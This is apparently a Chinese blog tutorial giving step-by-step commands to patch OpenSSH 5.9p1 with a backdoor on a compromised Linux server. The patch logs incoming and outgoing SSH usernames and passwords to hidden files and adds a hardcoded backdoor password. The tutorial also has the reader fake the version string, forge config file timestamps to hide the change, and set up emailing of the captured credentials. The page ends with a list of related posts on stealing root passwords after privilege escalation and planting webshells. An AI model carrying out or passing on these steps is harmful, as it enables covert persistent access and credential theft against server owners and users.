OpenSSH后门获取root密码

1. 查看sshd系统版本

[[email protected] src]# ssh -V

OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013

2. 解压版本,其中patch为补丁包

tar -zxvf 0x06-openssh-5.9p1.patch.tar.gz

tar -zxvf openssh-5.9p1.tar.gz

3. 替换补丁文件,替换前备份文件

mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old
mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old

cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1/

cd openssh-5.9p1

patch < sshbd5.9p1.diff # 打补丁就是替换或修改原来的文件

patching file auth.c # 认证

patching file auth-pam.c #认证

patching file auth-passwd.c #认证

patching file canohost.c

patching file includes.h

patching file log.c

patching file servconf.c # 关于sshd服务端

patching file sshconnect2.c # 关于sshd连接

patching file sshlogin.c # 关于登录,把root密码记录下来

patching file version.h # 关于版本

4. 修改后门密码和记录root密码的文件夹目录

vim includes.h

#define ILOG "/usr/share/ifile"  # 记录录到本机的用户名和密码

#define OLOG "/usr/share/ofile"  # 记录从本机登录到其他机器的用户名和密码

#define SECRETPW "12345678"  # 后门密码

5. 编辑vim version.h,修改版本号与原来一致

原来:OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013

6. 编译安装

组件:yum install -y openssl openssl-devel pam-devel zlib zlib-devel gcc

./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5

make -j 4 ;make install

--prefix=/usr   # 安装目录

--sysconfdir=/etc/ssh   # 指定sshd配置文件

--with-pam   # pam认证

--with-kerberos5   # kerberos认证

7. 还原新配置文件为旧配置文件时间

说明:将ssh_config和sshd_config修改时间跟ssh_config.old和sshd_config.old一致

touch -r/etc/ssh/ssh_config.old /etc/ssh/ssh_config
  touch -r/etc/ssh/sshd_config.old /etc/ssh/sshd_config

8. 重启sshd服务

service sshd restart

9. 验证并查看

登录后再次查看就记录了密码,修改了密码再次登录也会记录

1)记录录到本机的用户名和密码

2)记录从本机登录到其他机器的用户名和密码

3)后门密码登录

10. 配置自动发送邮件

........略

参看文献 http://www.cnblogs.com/croso/p/5280783.html

时间: 2024-10-04 13:06:47

OpenSSH后门获取root密码的相关文章

提权后获取linux root密码

提权后获取linux root密码 2011-09-09 10:45:25     我来说两句      收藏    我要投稿 在webbackdoor本身是root(可能性小的可怜)或通过某漏洞溢出成功得到最高权限后,如果能获取root密码能给我们带来很多的好处.查询了一下前辈的方法,一个是欺骗su记录密码,另外一个是替换sshd,我们先看看欺骗su记录密码的代码吧! 先看第一种,kpr-fakesu.c V0.9beta167 fucksu.c /* * kpr-fakesu.c V0.9b

Linux 忘记root密码如何破解?

假如忘记管理员root的密码,而且系统上也没有其他已知的管理员用户了,那么该如何操作? 就是想办法破解root密码,linux系统是可以在忘记密码的情况下重新设置root密码,下面是破解的过程: 1.重启或打开linux系统,然后开机的时候已知按e键,直到出现内核选择的界面: 2.然后再按一下键盘上的e键,就会出现以下界面: root (hd0,0):表示是内核所在的硬盘和硬盘分区,如果进行修改后会导致系统无法启动 kernel /vmlinux-3.14.22 ro root=UUID...

linux专题三之如何悄悄破解root密码(以redhat7.2x64为例)

root用户在linux系统中拥有至高无上的权限.掌握了root密码,差不对可以对linux系统随心所欲了,当然了,root用户也不是权限最高的用户. 但是掌握了root密码,基本上够我们用了.本文将带你如何悄悄破解root密码. 1. 首先重启,按↑↓键,进入如下界面,选择第一项,按下e键进行编辑. 2. 在此界面不断向下翻页,找到ro这一项,并进行修改,改为rw  init=/sysroot/bin/sh   3. 改完之后,按下Ctrl+X进入紧急模式    原理:启动一个shell环境,

PhpMyadmin利用Mysql root密码获取webshell

Simeon Phpmyadmin是一款著名的mysql在线管理系统,通过提供的mysql数据库用户账号和密码对所管理的数据库实施操作.在渗透过程中,一旦获取其mysql账号和对应的密码,轻者获取其账号所管理数据库,重者可以配合其它漏洞获取webshell权限和系统权限.Root账号及口令可以通过暴力破解,源代码泄露等途径获取,本文主要就其root账号获取以及phpmyadmin的利用.如何导出webshell等进行探讨. Mysql root账号及密码在phpmyadmin中的利用思路主要有以

linux忘记root密码重新获取的办法

linux忘记root密码,重新获取密码的方法 第一步:进入单用户模式 grub进入启动页面之后,敲入"e",把光标移动到"kernel ..."那一行,再敲入"e",然后在编辑界面rhgb quiet后面加"空格",然后键入"single",或者直接输入数字的"1"并回车确定.回车后敲入"b",启动系统,即进入单用户模式. 第二步:修改密码 进入单用户模式后在命令行

Linux OpenSSH后门的添加与防范

引言:相对于Windows,Linux操作系统的密码较难获取.不过很多Linux服务器配置了OpenSSH服务,在获取root权限的情况下,可以通过修改或者更新OpenSSH代码等方法,截取并保存其SSH登录账号和密码,甚至可以留下一个隐形的后门,达到长期控制Linux服务器的目的. 很多入侵者在攻破一个Linux系统后,都会在系统中留下后门,用OpenSSH留后门是入侵者的惯用方式之一.OpenSSH后门比较难检测,本文选自<黑客攻防:实战加密与解密>将与您一起探讨如何添加及防范OpenSS

应用获取root权限分析及总结

ROM授权root权限,主要技术点在哪里?如何实现?带着这些问题,边实验边分析,并将过程和犯的错误记录如下. 1.rom支持root授权,需要包含su 简单点说,就是rom中支持su指令:必须包含su可执行程序,对应的代码/system/su目录下代码: 编译生成su程序后,再将其push到/system/xbin目录下:注意:此时需要修改该文件的执行权限, chmod 755 su 2.应用程序如何获取root权限? 关键点在于下面这句,通过执行su产生一个具有root权限的进程:Proces

自动劫持root密码并转发密码到邮箱

自动劫持root密码并转发密码到邮箱 一:实验内容 自动劫持root密码并转发密码到邮箱   二:劫持root密码的过程: 过程1:如上图所示.黑客登录到sshd服务系统之后会用木马补丁文件将原来的sshd服务替换掉,并且留下后门密码,此后门密码还可以直接登录系统. 过程2:网络管理员登录到系统之后,所登录的路径已经不是原来真实安全的路径了,是由黑客替换掉的sshd服务和路径.在此登录之后,管理员修改账号密码或者其他操作都会被记录下来,自动发给黑客指定的邮箱. 过程3:有的时候时候网络管理员登录

MySQL 修改用户密码及重置root密码

为数据库用户修改密码是DBA比较常见的工作之一.对于MySQL用户账户的密码修改,有几种不同的方式,推荐的方式使用加密函数来修改密码.本文主要描述了通过几种不同的方式来修改用户密码以及mysql root账户密码丢失(重置root密码)的处理方法. 1.密码修改的几种方法 a.可以在创建用户的时候指定密码,以及直接使用grant创建用户的时候指定密码. 对于已经存在的用户直接使用grant方式也可以修改密码 如下: --演示版本 [email protected][(none)]> show v